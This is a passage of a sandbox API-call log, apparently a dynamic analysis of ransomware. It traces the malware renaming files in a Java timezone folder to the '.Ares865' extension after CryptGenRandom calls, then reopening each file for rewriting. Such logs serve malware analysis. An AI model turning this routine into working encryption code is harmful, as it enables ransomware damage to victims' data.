[0134.878] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0134.878] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0134.878] lstrcpyW (in: lpString1=0x2cce45a, lpString2="Rangoon" | out: lpString1="Rangoon") returned="Rangoon" [0134.878] lstrlenW (lpString="Rangoon") returned 7 [0134.879] lstrlenW (lpString="Ares865") returned 7 [0134.879] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Rangoon.Ares865") returned 60 [0134.879] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Rangoon" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\rangoon"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Rangoon.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\rangoon.ares865"), dwFlags=0x1) returned 1 [0134.880] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Rangoon.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\rangoon.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0134.880] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=85) returned 1 [0134.881] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0134.881] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0134.881] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0134.886] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0134.887] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0134.887] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0134.888] lstrcpyW (in: lpString1=0x2cce45a, lpString2="Riyadh" | out: lpString1="Riyadh") returned="Riyadh" [0134.888] lstrlenW (lpString="Riyadh") returned 6 [0134.888] lstrlenW (lpString="Ares865") returned 7 [0134.888] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Riyadh.Ares865") returned 59 [0134.888] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Riyadh" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\riyadh"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Riyadh.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\riyadh.ares865"), dwFlags=0x1) returned 1 [0134.890] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Riyadh.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\riyadh.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0134.890] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=65) returned 1 [0134.890] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0134.891] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0134.891] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0134.894] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0134.895] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0134.895] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0134.895] lstrcpyW (in: lpString1=0x2cce45a, lpString2="Riyadh87" | out: lpString1="Riyadh87") returned="Riyadh87" [0134.895] lstrlenW (lpString="Riyadh87") returned 8 [0134.895] lstrlenW (lpString="Ares865") returned 7 [0134.895] lstrcmpiW (lpString1="iyadh87", lpString2="Ares865") returned 1 [0134.896] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Riyadh87.Ares865") returned 61 [0134.896] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Riyadh87" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\riyadh87"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Riyadh87.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\riyadh87.ares865"), dwFlags=0x1) returned 1 [0134.898] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Riyadh87.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\riyadh87.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0134.898] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=4821) returned 1 [0134.898] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0134.899] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0134.899] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0134.901] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0134.902] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0134.902] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0134.902] lstrcpyW (in: lpString1=0x2cce45a, lpString2="Riyadh88" | out: lpString1="Riyadh88") returned="Riyadh88" [0134.902] lstrlenW (lpString="Riyadh88") returned 8 [0134.903] lstrlenW (lpString="Ares865") returned 7 [0134.903] lstrcmpiW (lpString1="iyadh88", lpString2="Ares865") returned 1 [0134.903] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Riyadh88.Ares865") returned 61 [0134.903] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Riyadh88" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\riyadh88"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Riyadh88.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\riyadh88.ares865"), dwFlags=0x1) returned 1 [0134.904] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Riyadh88.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\riyadh88.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0134.905] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=4733) returned 1 [0134.905] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0134.905] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0134.906] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0134.908] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0134.909] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0134.909] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0134.909] lstrcpyW (in: lpString1=0x2cce45a, lpString2="Riyadh89" | out: lpString1="Riyadh89") returned="Riyadh89" [0134.909] lstrlenW (lpString="Riyadh89") returned 8 [0134.909] lstrlenW (lpString="Ares865") returned 7 [0134.909] lstrcmpiW (lpString1="iyadh89", lpString2="Ares865") returned 1 [0134.910] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Riyadh89.Ares865") returned 61 [0134.910] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Riyadh89" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\riyadh89"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Riyadh89.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\riyadh89.ares865"), dwFlags=0x1) returned 1 [0134.911] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Riyadh89.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\riyadh89.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0134.911] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=4765) returned 1 [0134.912] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0134.912] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0134.912] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0134.915] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0134.915] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0134.915] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0134.916] lstrcpyW (in: lpString1=0x2cce45a, lpString2="Sakhalin" | out: lpString1="Sakhalin") returned="Sakhalin" [0134.916] lstrlenW (lpString="Sakhalin") returned 8 [0134.916] lstrlenW (lpString="Ares865") returned 7 [0134.916] lstrcmpiW (lpString1="akhalin", lpString2="Ares865") returned -1 [0134.916] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Sakhalin.Ares865") returned 61 [0134.916] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Sakhalin" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\sakhalin"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Sakhalin.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\sakhalin.ares865"), dwFlags=0x1) returned 1 [0134.920] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Sakhalin.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\sakhalin.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0134.920] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=585) returned 1 [0134.920] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0134.921] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0134.921] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0134.923] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0134.924] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0134.924] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0134.925] lstrcpyW (in: lpString1=0x2cce45a, lpString2="Samarkand" | out: lpString1="Samarkand") returned="Samarkand" [0134.925] lstrlenW (lpString="Samarkand") returned 9 [0134.925] lstrlenW (lpString="Ares865") returned 7 [0134.925] lstrcmpiW (lpString1="markand", lpString2="Ares865") returned 1 [0134.925] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Samarkand.Ares865") returned 62 [0134.925] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Samarkand" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\samarkand"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Samarkand.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\samarkand.ares865"), dwFlags=0x1) returned 1 [0134.927] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Samarkand.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\samarkand.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0134.927] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=261) returned 1 [0134.933] lstrcpyW (in: lpString1=0x2cce45a, lpString2="Seoul" | out: lpString1="Seoul") returned="Seoul" [0134.933] lstrlenW (lpString="Seoul") returned 5 [0134.933] lstrlenW (lpString="Ares865") returned 7 [0134.933] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Seoul.Ares865") returned 58 [0134.933] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Seoul" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\seoul"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Seoul.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\seoul.ares865"), dwFlags=0x1) returned 1 [0134.935] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Seoul.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\seoul.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0134.935] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=165) returned 1 [0134.939] lstrcpyW (in: lpString1=0x2cce45a, lpString2="Shanghai" | out: lpString1="Shanghai") returned="Shanghai" [0134.939] lstrlenW (lpString="Shanghai") returned 8 [0134.939] lstrlenW (lpString="Ares865") returned 7 [0134.939] lstrcmpiW (lpString1="hanghai", lpString2="Ares865") returned 1 [0134.939] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Shanghai.Ares865") returned 61 [0134.939] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Shanghai" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\shanghai"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Shanghai.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\shanghai.ares865"), dwFlags=0x1) returned 1 [0134.941] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Shanghai.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\shanghai.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0134.941] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=201) returned 1 [0134.944] lstrcpyW (in: lpString1=0x2cce45a, lpString2="Singapore" | out: lpString1="Singapore") returned="Singapore" [0134.944] lstrlenW (lpString="Singapore") returned 9 [0134.944] lstrlenW (lpString="Ares865") returned 7 [0134.944] lstrcmpiW (lpString1="ngapore", lpString2="Ares865") returned 1 [0134.945] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Singapore.Ares865") returned 62 [0134.945] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Singapore" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\singapore"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Singapore.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\singapore.ares865"), dwFlags=0x1) returned 1 [0134.946] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Singapore.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\singapore.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0134.946] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=133) returned 1 [0134.952] lstrcpyW (in: lpString1=0x2cce45a, lpString2="Taipei" | out: lpString1="Taipei") returned="Taipei" [0134.952] lstrlenW (lpString="Taipei") returned 6 [0134.952] lstrlenW (lpString="Ares865") returned 7 [0134.952] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Taipei.Ares865") returned 59 [0134.953] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Taipei" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\taipei"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Taipei.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\taipei.ares865"), dwFlags=0x1) returned 1 [0134.963] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Taipei.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\taipei.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0134.964] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=381) returned 1 [0134.967] lstrcpyW (in: lpString1=0x2cce45a, lpString2="Tashkent" | out: lpString1="Tashkent") returned="Tashkent" [0134.967] lstrlenW (lpString="Tashkent") returned 8 [0134.967] lstrlenW (lpString="Ares865") returned 7 [0134.967] lstrcmpiW (lpString1="ashkent", lpString2="Ares865") returned 1 [0134.968] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Tashkent.Ares865") returned 61 [0134.968] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Tashkent" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\tashkent"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Tashkent.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\tashkent.ares865"), dwFlags=0x1) returned 1 [0134.970] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Tashkent.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\tashkent.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0134.970] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=261) returned 1 [0134.973] lstrcpyW (in: lpString1=0x2cce45a, lpString2="Tbilisi" | out: lpString1="Tbilisi") returned="Tbilisi" [0134.973] lstrlenW (lpString="Tbilisi") returned 7 [0134.973] lstrlenW (lpString="Ares865") returned 7 [0134.974] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Tbilisi.Ares865") returned 60 [0134.974] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Tbilisi" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\tbilisi"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Tbilisi.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\tbilisi.ares865"), dwFlags=0x1) returned 1 [0134.976] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Tbilisi.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\tbilisi.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0134.976] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=469) returned 1 [0134.979] lstrcpyW (in: lpString1=0x2cce45a, lpString2="Tehran" | out: lpString1="Tehran") returned="Tehran" [0134.979] lstrlenW (lpString="Tehran") returned 6 [0134.979] lstrlenW (lpString="Ares865") returned 7 [0134.979] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Tehran.Ares865") returned 59 [0134.979] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Tehran" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\tehran"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Tehran.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\tehran.ares865"), dwFlags=0x1) returned 1 [0134.981] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Tehran.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\tehran.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0134.981] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=892) returned 1 [0134.983] lstrcpyW (in: lpString1=0x2cce45a, lpString2="Thimphu" | out: lpString1="Thimphu") returned="Thimphu" [0134.983] lstrlenW (lpString="Thimphu") returned 7 [0134.983] lstrlenW (lpString="Ares865") returned 7 [0134.984] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Thimphu.Ares865") returned 60 [0134.984] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Thimphu" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\thimphu"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Thimphu.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\thimphu.ares865"), dwFlags=0x1) returned 1 [0134.986] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Thimphu.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\thimphu.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0134.986] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=77) returned 1 [0134.989] lstrcpyW (in: lpString1=0x2cce45a, lpString2="Tokyo" | out: lpString1="Tokyo") returned="Tokyo" [0134.989] lstrlenW (lpString="Tokyo") returned 5 [0134.989] lstrlenW (lpString="Ares865") returned 7 [0134.989] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Tokyo.Ares865") returned 58 [0134.989] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Tokyo" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\tokyo"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Tokyo.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\tokyo.ares865"), dwFlags=0x1) returned 1 [0134.992] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Tokyo.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\tokyo.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0134.992] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=125) returned 1 [0134.995] lstrcpyW (in: lpString1=0x2cce45a, lpString2="Ulaanbaatar" | out: lpString1="Ulaanbaatar") returned="Ulaanbaatar" [0134.995] lstrlenW (lpString="Ulaanbaatar") returned 11 [0134.995] lstrlenW (lpString="Ares865") returned 7 [0134.995] lstrcmpiW (lpString1="nbaatar", lpString2="Ares865") returned 1 [0134.996] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Ulaanbaatar.Ares865") returned 64 [0134.996] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Ulaanbaatar" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\ulaanbaatar"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Ulaanbaatar.Ares865" (normalized: "c:\\program files 